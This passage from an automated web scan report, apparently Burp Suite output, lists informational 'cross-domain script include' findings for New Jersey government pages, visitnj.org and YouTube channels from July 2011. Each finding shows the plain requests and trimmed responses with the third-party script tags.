<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.67. http://www.state.nj.us/lottery/news/5-0_news.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/news/5-0_news.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/news/5-0_news.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 41359
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 12:32:44 GMT
Etag: "a18f-4e1c3eec"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.68. http://www.state.nj.us/lottery/news/p071111.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/news/p071111.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/news/p071111.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 2831
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 12:32:39 GMT
Etag: "b0f-4e1c3ee7"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

13.69. http://www.state.nj.us/lottery/news/p071111a.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/news/p071111a.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/news/p071111a.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 2798
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 12:32:40 GMT
Etag: "aee-4e1c3ee8"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

13.70. http://www.state.nj.us/lottery/retailer/7-0_retailer.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/retailer/7-0_retailer.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/retailer/7-0_retailer.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:27 GMT
Content-length: 13612
Content-type: text/html
Last-modified: Wed, 06 Jul 2011 17:28:57 GMT
Etag: "352c-4e149b59"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.71. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/vip/3-0_vip_gen_info.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/vip/3-0_vip_gen_info.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:22 GMT
Content-length: 14721
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 12:47:20 GMT
Etag: "3981-4e1af0d8"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.72. http://www.state.nj.us/lottery/where/4-0_where.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/where/4-0_where.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/where/4-0_where.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:23 GMT
Content-length: 25779
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 15:05:53 GMT
Etag: "64b3-4e1b1151"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.73. http://www.state.nj.us/treasury/doinvest/history3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /treasury/doinvest/history3.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /treasury/doinvest/history3.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:44 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.74. http://www.state.nj.us/treasury/revenue/credcrd.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /treasury/revenue/credcrd.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /treasury/revenue/credcrd.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:39 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.75. http://www.state.nj.us/treasury/revenue/dcr/geninfo/fees_pd.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /treasury/revenue/dcr/geninfo/fees_pd.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /treasury/revenue/dcr/geninfo/fees_pd.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:40 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.76. http://www.state.nj.us/treasury/revenue/dcr/geninfo/genserv.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /treasury/revenue/dcr/geninfo/genserv.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /treasury/revenue/dcr/geninfo/genserv.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:39 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.77. http://www.state.nj.us/treasury/revenue/dcr/geninfo/instform.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /treasury/revenue/dcr/geninfo/instform.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /treasury/revenue/dcr/geninfo/instform.html HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:39 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.78. http://www.state.nj.us/treasury/revenue/elffaq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /treasury/revenue/elffaq.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /treasury/revenue/elffaq.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:39 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<meta name="description" content="Send a Virtual Postcards"/>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/common_functions.js" type="text/JavaScript"></script>
   <script language="JavaScript" src="http://www.nj.gov/nj/includes/scripts/custom_functions.js" type="text/JavaScript"></script>
...[SNIP]...

13.79. http://www.unclaimedproperty.nj.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unclaimedproperty.nj.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.unclaimedproperty.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:44:42 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
}
</style>
<meta ht
...[SNIP]...
</script>
<script type='text/javascript' src='http://www.state.nj.us/treasury/javascript/menutree.js'></script>
<script type='text/javascript' src='http://www.state.nj.us/treasury/javascript/menu_com.js'></script>
...[SNIP]...

13.80. http://www.visitnj.org/events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visitnj.org
Path:   /events

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:26 GMT
ETag: "1c02c8d04dbc4f40ed09302c3263264b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...

13.81. http://www.visitnj.org/new-jerseys-wineries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visitnj.org
Path:   /new-jerseys-wineries

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 22:00:07 GMT
ETag: "fcfdc2bb205847c6a67cce0b8add1bc2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42712

<table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;"><tr><th colspan="2"> Database Error</th></tr>
<tr><td align="right" valign="top">Message:</td><td>[<b>M
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...

13.82. http://www.youtube.com/NewJerseyGovernment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /NewJerseyGovernment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /NewJerseyGovernment HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=wAQMWIHYLkY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
Set-Cookie: GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmhDekhtTGY2U282SEp5SmNxQXo0OTB0cEFQaU9sa2IzcGdmbVBIcmM1WWVn -->
<head>



...[SNIP]...
="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/NewJerseyGovernment/uploads?alt=rss&amp;v=2&amp;orderby=published&amp;client=ytapi-youtube-profile">


<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflporvst.js"></script>
...[SNIP]...
</script>


<script src="//s.ytimg.com/yt/jsbin/www-channel-vflvX29tu.js"></script>


<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflfI-Zw9.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

13.83. http://www.youtube.com/newjerseylottery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /newjerseylottery

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newjerseylottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:49:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=TlJvxUF36FY; path=/; domain=.youtube.com; expires=Fri, 09-Mar-2012 01:49:45 GMT
Set-Cookie: GEO=c573c10743b77a4d5e57ac0c7e9af241cwsAAAAzVVOtwdbzThz5uQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmpXZ2p5bkc3YWk5QVpReFYzTHhKaUtxb29Ha0x4MERGcVhDOWhJUjdVOWVn -->
<head>



...[SNIP]...
ype="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/newjerseylottery/uploads?alt=rss&amp;v=2&amp;orderby=published&amp;client=ytapi-youtube-profile">


<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflporvst.js"></script>
...[SNIP]...
</script>


<script src="//s.ytimg.com/yt/jsbin/www-channel-vflvX29tu.js"></script>


<script src="//s.ytimg.com/yt/js/channel_legacy_all-vflfI-Zw9.js"></script>

<script type="text/javascript" src="http://www.google.com/jsapi?autoload=%7B%22modules%22%3A%5B%7B%22name%22%3A%22ads%22%2C%22version%22%3A%221%22%2C%22callback%22%3A%22(function()%7B%7D)%22%2C%22packages%22%3A%5B%22content%22%5D%7D%5D%7D"></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js"></script>
...[SNIP]...
</div>

<script src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...

13.84. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www6.state.nj.us
Path:   /LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /LOT_LVC/jsp/lvc1_0_vip_reg.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=C2D1D22C30B568638365FC0BBB7F4E87;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://www.state.nj.us/lottery/style/internal_vip.css" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

13.85. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www6.state.nj.us
Path:   /LOT_LVC/jsp/lvc1_S0_login.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /LOT_LVC/jsp/lvc1_S0_login.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response